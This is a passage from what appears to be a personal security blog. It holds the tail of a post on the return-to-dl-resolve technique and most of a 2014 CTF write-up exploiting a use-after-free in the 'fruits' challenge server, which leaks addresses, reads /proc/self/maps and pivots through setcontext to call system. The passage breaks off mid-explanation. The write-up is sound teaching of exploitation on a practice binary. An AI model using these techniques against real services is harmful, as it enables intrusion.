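print(resolve_name(image, JMPREL, SYMTAB, STRTAB, 8))
```

<p>Nothing in this walk checks that the offsets stay inside their tables, which is exactly what the technique abuses.</p>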
<p>This technique is all about calling <code class="highlighter-rouge">dl-resolve</code> with specially crafted
arguments. We give it the index into the relocation table for system and the
original value for <code class="highlighter-rouge">link_map</code>. This is all very cool, except for the fact system
isn’t in that table. If it was it would also be in the GOT/PLT and we wouldn’t
be having this whole problem in the first place. The thing is, however, that
this index doesn’t really have to fit in the table. It can be way bigger so that
the relocation entry it points to is somewhere we control.</p>
<h3 id="structure-layout">Structure layout</h3>
<pre><code class="language-C">Elf32_Rel *reloc = JMPREL + index;
Elf32_Sym *sym = &SYMTAB[ELF32_R_SYM(reloc->r_info)];
name = STRTAB + sym->st_name;
</code></pre>
<p><code class="highlighter-rouge">index</code> is the argument to <code class="highlighter-rouge">dl-resolve</code> and <code class="highlighter-rouge">JMPREL</code>, <code class="highlighter-rouge">SYMTAB</code> and <code class="highlighter-rouge">STRTAB</code> are
constants because they are addresses of parts of the binary and there is no PIE.</p>
<p>We have everything we need to set up some fake structures on the heap, compute
the correct index and pass it to dl-resolve.</p>
<p>This works pretty well for the first line, but <code class="highlighter-rouge">reloc->r_info</code> is only stored
using one byte and the heap is far away from the original symtab (which is in
the binary!). This is a problem because there is no writable memory at all
within 4096 (<code class="highlighter-rouge">256 * sizeof (Elf32_Sym)</code>) bytes of the symtab.</p>
<p>The solution to this is a small detour. It turns out the symtab location isn’t
computed from scratch each time by parsing the binary, instead it is available
at a known location in the .bss. Let’s quickly overwrite that using a call to
<code class="highlighter-rouge">fgets</code> and make everyone believe the symtab is on the heap!</p>
<p>Once this is done we can execute our plan using the fake structures we have
set up and <code class="highlighter-rouge">dl-resolve</code> will fetch <code class="highlighter-rouge">system</code> and return to it for us.</p>
<h2 id="alternative-do-it-yourself">Alternative: Do it yourself</h2>
<p>After doing the previous technique during the CTF I learned it isn’t that hard
to locate libc. You can simply round a known address down to a multiple of
pagesize and keep subtracting pagesizes until it starts with <code class="highlighter-rouge">\x7fELF</code>. Another
(cleaner) way is, you know, to simply loop through the <code class="highlighter-rouge">link_map</code> until you find
the library you’re looking for. That’s what the bloody thing is supposed to be
used for after all. (If you don’t know what <code class="highlighter-rouge">link_map</code> is you should have read
the previous section.)</p>
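<p>The first approach fits in a few lines. Below is a sketch where <code class="highlighter-rouge">leak(address, size)</code> stands in for whatever leak primitive the exploit has; here it reads from a fake mapping so the example runs on its own. The function names, the 4 KiB page size and the addresses are assumptions.</p>

```python
PAGE = 0x1000  # assumed page size


def find_elf_base(leak, known_address, max_pages=0x1000):
    """Walk down page by page from `known_address` until the ELF magic shows up."""
    page = known_address & ~(PAGE - 1)
    for _ in range(max_pages):
        if leak(page, 4) == b"\x7fELF":
            return page
        page -= PAGE
    return None


# Stand-in for the real leak: a fake library mapped at a made-up base address.
BASE = 0xF7500000
fake_mapping = b"\x7fELF" + b"\x00" * (5 * PAGE)


def leak(address, size):
    offset = address - BASE
    return fake_mapping[offset:offset + size]


print(hex(find_elf_base(leak, BASE + 0x3ABC)))
```

<p>Against a real target the walk can run into an unmapped page if the known address isn’t inside the library’s first contiguous mapping, so the leak has to be able to survive that.</p>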
<p>Once you have the start of libc and you have something that lets you repeatedly
leak from an arbitrary address it is trivial to parse any library’s <code class="highlighter-rouge">.dynsym</code> to
retrieve whatever symbol. This technique can be seen in this
<a href="https://github.com/ctfs/write-ups/blob/master/hack-lu-ctf-2014/oreo/exploit-by-cutz.pl">exploit</a>.</p>
<p>Because those conditions are met most of the time, I think this is the reason
the previous technique is so rarely used, since it requires a lot of fake
structure setup. I believe the return to <code class="highlighter-rouge">dl-resolve</code> can still be useful
sometimes because it doesn’t require any leaks per se. In a non-PIE binary it
should be possible to pull it off without leaking anything. The only time I had
to leak stuff in this exploit was because I had to corrupt the whole GOT to do
my overly-complicated pivot and still needed the original values for later.</p>wapiflapiHack.lu 2014 was really well done and entertaining. For one challenge we needed to get system from an unknown libc while bypassing ASLR. The return to dl-resolve technique I used wasn’t known to me and I will explain it in this post.Getting a shell on fruits - bkpctf 20142014-04-30T00:00:00+00:002014-04-30T00:00:00+00:00https://wapiflapi.github.io/2014/04/30/getting-a-shell-on-fruits-bkpctf-2014<p>Long time no see! I just spent two days exploiting a CTF challenge and people
want me to do a writeup so here we go. Full sploit can be found here:
<a href="http://pastebin.com/0px8FEJ7">http://pastebin.com/0px8FEJ7</a></p>
<p>The binary we will be looking at is <em>fruits</em> from Boston Key Party CTF 2014,
thanks guys! It can be found here:
<a href="http://pastebin.com/n4Z9Vw4A">pastebin.com/n4Z9Vw4A</a></p>
<blockquote>
<p>fruits: ELF 64-bit, uses shared libs, for GNU/Linux 2.6.24, stripped
Canary found NX enabled PIE enabled</p>
</blockquote>
<p>Ok, about every protection we can think of is activated but also we don’t just
want to read the key file. No, we want a shell. Why? Because of some guy named
palkeo who challenged me and will now buy me a beer some day.</p>
<h2 id="about-fruits">About fruits</h2>
<p>fruits is a server listening on 37717, it forks a process
for each client who can then order apples and pears and leave some notes. Here
is the menu we get when connecting to the server:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to our store's shopping cart!
========================================
Cart is empty.
Main Menu:
[0]: Submit Order
[1]: List Notes
[2]: Add a Note
[3]: Change a Note
[4]: Read note from file
[5]: Delete a Note
[6]: Add an Item to your Cart
[7]: Change Item Quantity
[8]: Delete Item from cart
[9]: Set favorite item
[10]: Change fav item
[11]: Print favorite item
Choose an option:
</code></pre></div></div>
<p>First let’s do a quick overview of all the features:</p>
<h4 id="submit-order">Submit Order</h4>
<p>Tells us our order has been placed, doesn’t seem to actually do anything at
all.</p>
<h4 id="list-notes-add-a-note-change-a-note-read-note-from-file-delete-a-note">List Notes, Add a Note, Change a Note, Read note from file, Delete a Note</h4>
<p>Those are pretty self explanatory: we have the ability to add, change and delete
notes. We can see the notes we added with option 1. Option 4 tells us we can’t
read a note from a file because we’re not admin. Since this is a CTF exercise,
this kind of option hints at the fact that there probably is a key in some file
cleverly named <em>key</em> or <em>flag</em>. We shouldn’t focus on getting code execution too
much because bypassing this admin check is probably enough, especially since
this is 100pts.</p>
<h4 id="add-an-item-to-your-cart-change-item-quantity-delete-item-from-cart">Add an Item to your Cart, Change Item Quantity, Delete Item from cart</h4>
<p>This second set of features allows us to do the shopping. There are two kinds of
objects we can buy, apples and pears. Each time we add an <em>item</em> to our cart it
adds an entry to the cart. When we change the quantity of an item it changes the
quantity for that entry, not the total amount of apples or pears we have in our
cart. We can have: 1 apple + 2 pears + 3 apples + 4 pears, this would be four
items.</p>
<h4 id="set-favorite-item-change-fav-item-print-favorite-item">Set favorite item, Change fav item, Print favorite item</h4>
<p>This is <strong>not</strong> self explanatory! First, remember an item is an entry in the
cart, not apples or pears. But the most counter-intuitive part (to me at least) is
the fact that option 10, <em>Change fav item</em>, doesn’t change which entry is your
favorite item; instead it <strong>changes the item itself</strong> to become apples or
pears according to what you select. The last option prints the type of our
favorite item.</p>
<h1 id="solving-the-ctf-task">Solving the CTF Task</h1>
<p>After some testing we quickly find a vulnerability. If the favorite item is
deleted a use after free seems to be triggered when we try to print the
favorite item because the server crashes.</p>
<p>Crashing is definitely not what we want, so let’s not print our favorite item
just yet. Instead let’s see if we can play with that memory somehow before it
crashes.</p>
<p>There seem to be two kinds of objects in this program, items and notes. If we
add a new item it will probably end up in the spot of the old one. The problem
is that from the server’s point of view everything will be normal again because the
favorite item is indeed an item. Let’s play with the notes instead. In order to
reuse the freed memory the note should be about the size of an item; this can be
reverse engineered or simply guessed using trial and error.</p>
<p>Let’s assume our new note took the place of the deleted item, now what? We just
filled that memory with “a”s and printing the favorite item still crashes
(why wouldn’t it?).</p>
<h2 id="defeating-pie">Defeating PIE</h2>
<p>Since we have full ASLR & PIE, our priority should be leaking some stuff to get
an idea of what is going on. We have this note filled with “a”s that’s at the
same time our favorite item. How could we convince the server to write some
address to it? The only actions that change an item are changing its quantity or
changing its type (which is possible since it’s our favorite).</p>
<p>Let’s try the latter. These are the actions we take:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[6]: Add an Item to your Cart
[9]: Set favorite item
[8]: Delete Item from cart // Now the favorite item is freed.
[2]: Add a Note // The note uses the freed memory.
[10]: Change fav item // This writes to our note :-)
[1]: List Notes
</code></pre></div></div>
<p>Or <code class="highlighter-rouge">6 0 9 0 8 0 2 aaaaaaaaaaaaaaaa 10 0 1</code> for short, this is what I get:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Notes (1):
#0: Pé"^
</code></pre></div></div>
<p>Looks like a leak to me. We just need to figure out what exactly is leaked.
For this we have two options. a) We can disassemble the binary and check what
exactly is touched when we change an item’s type. b) We can take the address
and check what it points to at runtime in gdb.</p>
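<p>Here is a minimal sketch of how the sequence above and the decoding of the
leaked bytes could be scripted. It is not taken from the actual exploit: sending
one answer per line and my reading of what each answer means are assumptions, and
the helper names are made up for illustration.</p>

```python
import struct

# Menu answers copied from the walkthrough above. The comments are my reading
# of what each answer does, which is an assumption.
UAF_LEAK_STEPS = [
    "6", "0",       # add an item to the cart
    "9", "0",       # set it as the favorite item
    "8", "0",       # delete it: the favorite pointer now dangles
    "2", "a" * 16,  # add a note that should reuse the freed memory
    "10", "0",      # change fav item: writes a pointer into our note
    "1",            # list notes: prints that pointer as raw bytes
]


def build_input(steps):
    """Join the answers, one per line (assumed input format)."""
    return ("\n".join(steps) + "\n").encode()


def decode_leak(raw):
    """Turn the bytes printed for the note into an address.

    The note is printed as a string, so the null high bytes of the pointer
    are missing. Pad back to 8 bytes and read it as little-endian.
    """
    if len(raw) > 8:
        raise ValueError("expected at most 8 leaked bytes")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]
```

<p>For example, the six bytes <code class="highlighter-rouge">90 7d 75 55 55 55</code> decode to <code class="highlighter-rouge">0x555555757d90</code>.</p>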
<p>Under gdb the leaked address I get is 0x0000555555757d90.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0000| 0x555555757d90 --> 0x555555556400 (lea rax,[rip+0x133])
</code></pre></div></div>
<p>Apparently that’s the address of a function pointer. This address points
somewhere in the program which means we just defeated PIE. On linux ASLR
randomizes mmap’s base address, but doesn’t re-randomize between each subsequent
call to it. That means in theory leaking the address of the binary is enough to
compute the addresses for the heap & libc. But I didn’t know that three days ago
and it doesn’t work very well on this binary anyway, so let’s not assume this.</p>
<h2 id="reading-a-file">Reading a file</h2>
<p>Changing the favorite item’s type restored a pointer. Let’s check if that fixed
the crash when we print it.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Choose an option:11
Your favorite item is a Pear
</code></pre></div></div>
<p>It does! That means this pointer is used: if we can set the pointer to the
address of something useful then we’re done. We still haven’t done a lot of
reversing or studied how the memory is handled, but we need to be able to set
that pointer to what we want. The first thing that comes to mind is simply
changing the note to something else and checking if printing the favorite item
starts crashing again. If it does then we are able to write back to the pointer
after it has leaked by modifying the note. (We could also start all over again
because this is a forking server and the addresses should always be the same,
but that’s no fun!) Remember the goal is probably to read a file, so let’s take
a look at the code for <em>Read note from file</em>. The main loop of the binary looks
like this:</p>
<p><a href="http://2.bp.blogspot.com/-IXPf9bbHKxQ/U2BbctvgD5I/AAAAAAAAAFs/hw660q-bS1U/s1600/snapshot.png"><img src="http://2.bp.blogspot.com/-IXPf9bbHKxQ/U2BbctvgD5I/AAAAAAAAAFs/hw660q-bS1U/s1600/snapshot.png" alt="" /></a></p>
<p>If we use option 4 a check is performed before calling the function from an
array of function pointers. Function pointers? Cool that’s exactly what we need:
The known address of the address of a piece of code. We need the offset between
the leaked pointer and the address of the function pointer for option 4.</p>
<p>According to IDA, the array of function pointers (rbx in the above diagram) is
at <code class="highlighter-rouge">off_203CA0</code>. Each pointer is 8 bytes, so the pointer for option 4 is at
<code class="highlighter-rouge">off_203CC0</code>. Under gdb the leaked address was <code class="highlighter-rouge">0x0000555555757d90</code> and the
program is mapped at <code class="highlighter-rouge">0x0000555555554000</code>.</p>
<p>0x0000555555554000 + 0x203CC0 - 0x0000555555757d90 = <strong>-0xd0</strong></p>
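<p>The same arithmetic as a small Python sketch. The constants are the ones
quoted above; the function names are made up for illustration.</p>

```python
# Values copied from the gdb session and the IDA listing quoted above.
IMAGE_BASE = 0x0000555555554000  # where the binary is mapped under gdb
LEAKED = 0x0000555555757D90      # address leaked through the note
HANDLERS = 0x203CA0              # off_203CA0: start of the handler array
POINTER_SIZE = 8


def handler_slot(option):
    """Image-relative address of the function pointer for a menu option."""
    return HANDLERS + option * POINTER_SIZE


# Distance from the leaked address to the slot of option 4.
DELTA = IMAGE_BASE + handler_slot(4) - LEAKED


def slot_from_leak(leak):
    """Address of the option 4 slot, computed from a fresh leak."""
    return leak + DELTA
```

<p>Since the delta only depends on the layout of the binary, it stays the same
whatever base address the loader picks.</p>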
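<p>Anyway, long story short: writing the leaked address minus <code class="highlighter-rouge">0xd0</code> into the note and then printing the favorite item calls the <em>Read note from file</em> handler without going through the admin check. That works.</p>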
<h1 id="now-how-do-we-pop-a-shell">Now how do we pop a shell?</h1>
<h2 id="recon">Recon</h2>
<p>Now we have a basic understanding of the vulnerability, and that’s enough to
ret2text and trigger the read file. But if we are going to pop a shell we’ll
need more than that. Let’s start by examining where exactly the pointer we
control is used. So far we know it’s a pointer to a function that is called,
but that’s all we know.</p>
<p><a href="http://2.bp.blogspot.com/-I2pcaL8t0d0/U2EFQTipRtI/AAAAAAAAAGQ/EClJNREGMiA/s1600/snapshot.png"><img src="http://2.bp.blogspot.com/-I2pcaL8t0d0/U2EFQTipRtI/AAAAAAAAAGQ/EClJNREGMiA/s1600/snapshot.png" alt="" /></a></p>
<p>Since the crashes were caused when triggering the print favorite item option,
that’s a good place to start looking. We can see a pointer to the favorite item
was stored and is now loaded into rdi. The first 8 bytes of an item seem to
contain the address of a pointer to a function that returns its name, “apple” or “pear”.
That’s consistent with what we experienced during the CTF when blindly setting a function
pointer and hoping it would be called. <code class="highlighter-rouge">print_fav</code> doesn’t touch
any registers except for <code class="highlighter-rouge">rdi</code> and <code class="highlighter-rouge">rax</code>, so maybe <code class="highlighter-rouge">rsi</code> or others contain
something useful. The following is a dump of what we get when setting
<code class="highlighter-rouge">"BBBBBBBB"</code> as the first bytes of our note/favorite item. We get a crash when
we attempt to <code class="highlighter-rouge">call [rax]</code>.</p>
<p><a href="http://1.bp.blogspot.com/-FHrjp9iq5B0/U2EOg5zPtGI/AAAAAAAAAG8/SZKu31yfXWM/s1600/snapshot.png"><img src="http://1.bp.blogspot.com/-FHrjp9iq5B0/U2EOg5zPtGI/AAAAAAAAAG8/SZKu31yfXWM/s1600/snapshot.png" alt="" /></a></p>
<p><a href="http://4.bp.blogspot.com/-C1Js1Y_8uDw/U2EOqkbklFI/AAAAAAAAAHE/avyxI59xavY/s1600/snapshot.png"><img src="http://4.bp.blogspot.com/-C1Js1Y_8uDw/U2EOqkbklFI/AAAAAAAAAHE/avyxI59xavY/s1600/snapshot.png" alt="" /></a></p>
<p>As expected, <code class="highlighter-rouge">rdi</code> points to the favorite item and <code class="highlighter-rouge">rax</code> contains the address
loaded from the beginning of the item during the previous instruction. The other
registers couldn’t be less helpful. <code class="highlighter-rouge">rsi</code>, <code class="highlighter-rouge">rdx</code> and <code class="highlighter-rouge">rcx</code> which are the other
arguments to the call contain garbage that we can’t control, and the other
registers have some pointers to code. What about the stack?</p>
<p><a href="http://2.bp.blogspot.com/-qGgR7jTdS3k/U2EOTHnmFiI/AAAAAAAAAG0/IYntKU76GZk/s1600/snapshot.png"><img src="http://2.bp.blogspot.com/-qGgR7jTdS3k/U2EOTHnmFiI/AAAAAAAAAG0/IYntKU76GZk/s1600/snapshot.png" alt="" /></a></p>
<p>Wow that’s empty. <code class="highlighter-rouge">0x555555556375</code> is the return address into the main loop we
saw earlier, and then we already have main’s stack frame. Nothing we control at
all. Bad luck.</p>
<h2 id="ok-what-do-we-have">OK, what do we have?</h2>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x555555555960: mov rax,QWORD PTR [rdi]
0x555555555963: call QWORD PTR [rax]
</code></pre></div></div>
<p>The <em>only</em> thing we control is the memory <code class="highlighter-rouge">rdi</code> points to. We control up to
63 bytes of it, provided we don’t use null bytes or newlines, which would cut the
note short. We do not have any other registers or the stack to work with. On the plus
side: we did leak an address and bypass PIE.</p>
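<p>These constraints are easy to check before sending anything. A minimal
sketch, with helper names of my own; stripping the trailing null bytes of a
pointer assumes the remaining high bytes end up being zero in memory, which
depends on how the note is stored.</p>

```python
import struct

NOTE_MAX = 63  # usable bytes in a note, per the text above


def pack_pointer(address):
    """Little-endian pointer with its trailing null bytes stripped.

    Assumption: the high bytes we leave out are zero (or get zeroed) in the
    target memory, so the pointer still reads back as intended.
    """
    return struct.pack("<Q", address).rstrip(b"\x00")


def is_note_safe(payload):
    """True if the payload fits in a note and would not be cut short."""
    return (
        len(payload) <= NOTE_MAX
        and b"\x00" not in payload
        and b"\n" not in payload
    )
```

<p>An address that happens to contain a <code class="highlighter-rouge">0x0a</code> byte fails the check, and so does a full 8 byte pointer with its null high bytes.</p>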
<p>What can we do with this? Not much: the only thing we can do is call code
pointed to by an address stored at a known location in memory, that is to say
in the binary itself. Think function pointers, vtables, GOT, etc…
Can we have a list? Of course. Here you go:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x555555758010 --> 0x7ffff7df04e0 (sub rsp,0x38)
0x555555758018 --> 0x7ffff7a97c30 (<free>)
0x555555758020 --> 0x7ffff7b104e0 (<setsockopt>)
0x555555758028 --> 0x5555555551d6 (<inet_ntoa@plt+6>)
0x555555758030 --> 0x5555555551e6 (<fclose@plt+6>)
0x555555758038 --> 0x5555555551f6 (<__stack_chk_fail@plt+6>)
0x555555758040 --> 0x7ffff7a9bc90 (movd xmm1,esi)
0x555555758048 --> 0x7ffff7a86940 (<getc>)
0x555555758050 --> 0x7ffff7b00de0 (<close>)
0x555555758058 --> 0x7ffff7a86350 (<fputc>)
0x555555758060 --> 0x7ffff7a35dd0 (<__libc_start_main>)
0x555555758068 --> 0x555555555256 (<fgets@plt+6>)
0x555555758070 --> 0x555555555266 (<feof@plt+6>)
0x555555758078 --> 0x555555555276 (<__gmon_start__@plt+6>)
0x555555758080 --> 0x7ffff7a97590 (<malloc>)
0x555555758088 --> 0x7ffff7a82d20 (<fflush>)
0x555555758090 --> 0x7ffff7b101d0 (<listen>)
0x555555758098 --> 0x7ffff7a71a80 (<sscanf>)
0x5555557580a0 --> 0x7ffff7a97d30 (<realloc>)
0x5555557580a8 --> 0x7ffff7a82a70 (<fdopen>)
0x5555557580b0 --> 0x5555555552e6 (<__printf_chk@plt+6>)
0x5555557580b8 --> 0x7ffff7b100b0 (<bind>)
0x5555557580c0 --> 0x555555555306 (<memmove@plt+6>)
0x5555557580c8 --> 0x555555555316 (<fopen@plt+6>)
0x5555557580d0 --> 0x7ffff7b10050 (<accept>)
0x5555557580d8 --> 0x555555555336 (<exit@plt+6>)
0x5555557580e0 --> 0x7ffff7a83bc0 (<fwrite>)
0x5555557580e8 --> 0x7ffff7b1e300 (<__fprintf_chk>)
0x5555557580f0 --> 0x7ffff7a9d660 (<strdup>)
0x5555557580f8 --> 0x555555555376 (<__cxa_finalize@plt+6>)
0x555555758100 --> 0x7ffff7ad5db0 (<fork>)
0x555555758108 --> 0x7ffff7b10540 (<socket>)
</code></pre></div></div>
<p>There are also a bunch of pointers to code contained in the binary (other than
the PLT included in the list above) but the binary doesn’t contain anything
obviously useful to us so I didn’t include those.</p>
<p>That’s everything we have. Now we need to start thinking about what we can do
with this.</p>
<h2 id="expanding">Expanding</h2>
<p>None of the functions above will spawn us a shell, especially since we only
control the first argument, and in a very limited way: The first argument points
to memory starting with the address of the code being called, that will very
likely mess things up. Even if we had a known pointer to <code class="highlighter-rouge">system</code> the null bytes
in the address would cut the command before anything useful. As none of the
above functions work out of the box we’ll need to find a way to call something
else. To do this we’ll have to put a pointer to what we want at a known location
in memory. The only place where we can reasonably write is on the heap, using
notes. For our note on the heap to be at a known address we’d have to leak it
first. That’s our first goal.</p>
<h3 id="leaking-a-heap-address">Leaking a heap address</h3>
<p>Let’s look at our list of callable functions again. Given the first argument is a
pointer to our note, how can we leak the heap? We’re lucky this time. The first
named function in the list gives us a solution: <code class="highlighter-rouge">free</code>. If we call <code class="highlighter-rouge">free</code>, libc’s malloc will
reclaim the space used by the note and write some pointers to it for
bookkeeping. Because the program doesn’t know we freed the note behind its back
we’ll still be able to list the notes and leak the pointer. You might want to
add a second note after this, then you’ll have note0 and note1 using the same
memory, the memory that’s also used by the favorite item. If you don’t do this
the next allocation from libc or whatever will mess with you.</p>
<h3 id="getting-libc">Getting libc</h3>
<p>OK, we’re now able to call any address we want using a trampoline because we can
compute the heap addresses of our notes. There isn’t a silly call to random
anywhere in dlmalloc’s implementation. But that still limits us to calling code
contained in the binary and there aren’t a lot of useful gadgets to ROP with.
There is a nice trick here: remember the way to solve the challenge by simply
reading the flag.txt file? Well, we can do the same with <code class="highlighter-rouge">/proc/self/maps</code>. A
note is limited to 63 characters, but luckily libc will always be the first
mapping, except under gdb. We leaked addresses for the heap and libc, we’re
making progress: <strong>ASLR is defeated</strong>. (Actually not quite, because we still
don’t know the stack, but whatever!) We can call any piece of code we want
now. But still, we don’t control the registers as much as we’d like.</p>
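<p>Parsing the leaked line is straightforward because only the first field
matters. A minimal sketch: the example line and the symbol offset are
hypothetical, not values from the real target.</p>

```python
def mapping_start(maps_line):
    """Return the start address of one /proc/self/maps line.

    Only the leading 'start-end' field is used, so a line truncated by the
    63 character note limit still parses.
    """
    address_range = maps_line.split()[0]
    start, _, _end = address_range.partition("-")
    return int(start, 16)


def libc_address(maps_line, symbol_offset):
    """Address of something in libc, given its offset from the mapping start."""
    return mapping_start(maps_line) + symbol_offset


# Hypothetical first line, cut to 63 characters like a note would be.
EXAMPLE_LINE = (
    "7ffff7a14000-7ffff7bcf000 r-xp 00000000 08:01 1234567"
    "   /lib/x86_64-linux-gnu/libc-2.19.so"
)[:63]
```

<p>The offsets themselves depend on the exact libc on the server, which is
why the exploit needs adjusting from one machine to another.</p>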
<h2 id="control">Control</h2>
<p>Now that we have knowledge of where the heap and libc are located in memory it
is time to start thinking about an actual exploit. We can call any piece of code
we want and we control parts of the memory pointed to by rdi. What can we call?
Well that’s a good question, I spent hours on this trying to find a good
gadget. After a while I stumbled upon some code from setcontext. If you don’t
know what setcontext is then go read the man page, <strong>now</strong>. This gadget is
pretty amazing:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code><setcontext+53>: mov rsp, QWORD PTR [rdi+0xa0]
<setcontext+60>: mov rbx, QWORD PTR [rdi+0x80]
<setcontext+67>: mov rbp, QWORD PTR [rdi+0x78]
<setcontext+71>: mov r12, QWORD PTR [rdi+0x48]
<setcontext+75>: mov r13, QWORD PTR [rdi+0x50]
<setcontext+79>: mov r14, QWORD PTR [rdi+0x58]
<setcontext+83>: mov r15, QWORD PTR [rdi+0x60]
<setcontext+87>: mov rcx, QWORD PTR [rdi+0xa8]
<setcontext+94>: push rcx
<setcontext+95>: mov rsi, QWORD PTR [rdi+0x70]
<setcontext+99>: mov rdx, QWORD PTR [rdi+0x88]
<setcontext+106>: mov rcx, QWORD PTR [rdi+0x98]
<setcontext+113>: mov r8, QWORD PTR [rdi+0x28]
<setcontext+117>: mov r9, QWORD PTR [rdi+0x30]
<setcontext+121>: mov rdi, QWORD PTR [rdi+0x68]
<setcontext+125>: xor eax, eax
<setcontext+127>: ret
</code></pre></div></div>
<p>All registers, including <code class="highlighter-rouge">rsp</code> and <code class="highlighter-rouge">rbp</code>, are loaded from the memory pointed to
by <code class="highlighter-rouge">rdi</code> and we control where we ret to.</p>
<p>The problem is the offsets, they are pretty large, and we only control 63 bytes
through our notes. We’ll have to setup the heap in such a way that we have the
values we want where we want them. There might be a correct way to do this, I
don’t know. The way I did it is simple: I just played around with different
allocation patterns until I found something that seemed to work OK.</p>
<p>I started by doing a simple loop, adding some notes so that I could see what the
heap looked like. This is what I got, dumping from rdi, our favorite note:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0000| 0x555555759490 --> 0x555555757cc0 --> 0x555555555a90 (push rbx)
0008| 0x555555759498 ('o' <repeats 15 times>)
0016| 0x5555557594a0 --> 0x6f6f6f6f6f6f6f ('ooooooo')
0024| 0x5555557594a8 --> 0x21 ('!')
0032| 0x5555557594b0 ("11111111")
0040| 0x5555557594b8 --> 0x555555759400 --> 0x0
0048| 0x5555557594c0 --> 0x555555759520 ("00000000")
0056| 0x5555557594c8 --> 0x51 ('Q')
0064| 0x5555557594d0 --> 0x0
0072| 0x5555557594d8 --> 0x555555759490 --> 0x555555757cc0 --> 0x555555555a90 (push rbx)
0080| 0x5555557594e0 --> 0x555555759520 ("00000000")
0088| 0x5555557594e8 --> 0x5555557594b0 ("11111111")
0096| 0x5555557594f0 --> 0x555555759570 ("22222222")
0104| 0x5555557594f8 --> 0x5555557595d0 ("33333333")
0112| 0x555555759500 --> 0x5555557595f0 ("44444444")
0120| 0x555555759508 --> 0x555555759610 ("55555555")
0128| 0x555555759510 --> 0x555555759630 ("66666666")
0136| 0x555555759518 --> 0x21 ('!')
0144| 0x555555759520 ("00000000")
0152| 0x555555759528 --> 0x0
0160| 0x555555759530 --> 0x0
0168| 0x555555759538 --> 0x31 ('1')
0176| 0x555555759540 --> 0x0
0184| 0x555555759548 --> 0x555555759490 --> 0x555555757cc0 --> 0x555555555a90 (push rbx)
0192| 0x555555759550 --> 0x555555759520 ("00000000")
0200| 0x555555759558 --> 0x5555557594b0 ("11111111")
0208| 0x555555759560 --> 0x555555759570 ("22222222")
0216| 0x555555759568 --> 0x21 ('!')
0224| 0x555555759570 ("22222222")
0232| 0x555555759578 --> 0x555555759500 --> 0x5555557595f0 ("44444444")
0240| 0x555555759580 --> 0xffffffffffffffff
0248| 0x555555759588 --> 0x41 ('A')
0256| 0x555555759590 --> 0x0
0264| 0x555555759598 --> 0x555555759490 --> 0x555555757cc0 --> 0x555555555a90 (push rbx)
0272| 0x5555557595a0 --> 0x555555759520 ("00000000")
0280| 0x5555557595a8 --> 0x5555557594b0 ("11111111")
0288| 0x5555557595b0 --> 0x555555759570 ("22222222")
0296| 0x5555557595b8 --> 0x5555557595d0 ("33333333")
0304| 0x5555557595c0 --> 0x5555557595f0 ("44444444")
0312| 0x5555557595c8 --> 0x21 ('!')
0320| 0x5555557595d0 ("33333333")
</code></pre></div></div>
<p>That’s a lot of copy/pasta, but it’s necessary to show you the patterns. For
this test I added 8 notes: <code class="highlighter-rouge">"00000000"</code> to <code class="highlighter-rouge">"77777777"</code>, so not everything is
included in this dump obviously. There are two things to note in this dump.
First we have the raw notes at offsets 0, 32, 144, 224 and 320. The other thing
we have are the lists of pointers to our notes at offsets 72, 184 and 264.
If you look carefully you’ll see each list always starts with our note0 (the one
that we use to trigger use after frees) and then continues sequentially with the
other notes we add. However they don’t all stop with the same note. This “list”
is actually an array that the program uses to keep track of all the notes. It is
reallocated every time a note is added or deleted, that’s why it’s in several
places.</p>
<p>Now, what we need before jumping into setcontext is a little bit different. If
you look back at the way the registers are loaded we notice we can jump after
the moment <code class="highlighter-rouge">rsp</code> is loaded and avoid changing our stack if we want to. The one
location we MUST control is <code class="highlighter-rouge">rdi + 0xa8</code> because that contains the address we will
<code class="highlighter-rouge">ret</code> to.</p>
<p>Basically we have two options. We can control <code class="highlighter-rouge">rsp</code> and <code class="highlighter-rouge">ret</code>’s target and do a
ropchain. But that’s pretty hard to pull off because those two are loaded from
consecutive addresses. Due to the null bytes we can’t simply write both of them
in the same note. The second option is to control <code class="highlighter-rouge">rdi</code> and <code class="highlighter-rouge">ret</code>’s target and
call system with a controlled argument. That sounds way easier to do.</p>
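<p>To make the second option concrete, here is a toy model of the gadget
in Python. The offsets and <code class="highlighter-rouge">setcontext+N</code> labels come from the listing above;
the memory model, the <code class="highlighter-rouge">ret</code> pseudo register and the function name are mine.</p>

```python
# (setcontext+N label, register, offset from rdi), in the order of the
# listing above. "ret" stands for the value pushed at +94 and popped by the
# final ret instruction.
GADGET = [
    (53, "rsp", 0xA0), (60, "rbx", 0x80), (67, "rbp", 0x78),
    (71, "r12", 0x48), (75, "r13", 0x50), (79, "r14", 0x58),
    (83, "r15", 0x60), (87, "ret", 0xA8),
    (95, "rsi", 0x70), (99, "rdx", 0x88), (106, "rcx", 0x98),
    (113, "r8", 0x28), (117, "r9", 0x30), (121, "rdi", 0x68),
]


def run_gadget(memory, rdi, entry=87):
    """Registers loaded when entering the gadget at setcontext+entry.

    memory maps absolute addresses to 8 byte values; unmapped reads give 0.
    Every load uses the original rdi because rdi itself is replaced last.
    """
    regs = {}
    for label, reg, offset in GADGET:
        if label >= entry:
            regs[reg] = memory.get(rdi + offset, 0)
    return regs
```

<p>Entering at <code class="highlighter-rouge">setcontext+87</code> leaves <code class="highlighter-rouge">rsp</code> alone, so only the values at
<code class="highlighter-rouge">rdi + 0x68</code> and <code class="highlighter-rouge">rdi + 0xa8</code> really matter.</p>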
<p>We’re almost there. If we manage to put the address of a payload at <code class="highlighter-rouge">rdi + 0x68</code>
and the address of system at <code class="highlighter-rouge">rdi + 0xa8</code> it’s a win. But that took (me) a long
time, I didn’t really know what I was doing and I had no experience with heap
spraying. Finally the following routine worked out OK:</p>
<ol>
<li>Add a bunch of notes with the address of system</li>
<li>Delete those notes in order to empty the array</li>
<li>Add a bunch of notes with a payload, the array will fill with pointers to it.</li>
</ol>
<p>The payload notes should have a different size than the system ones, otherwise
they will end up overwriting our pointers.</p>
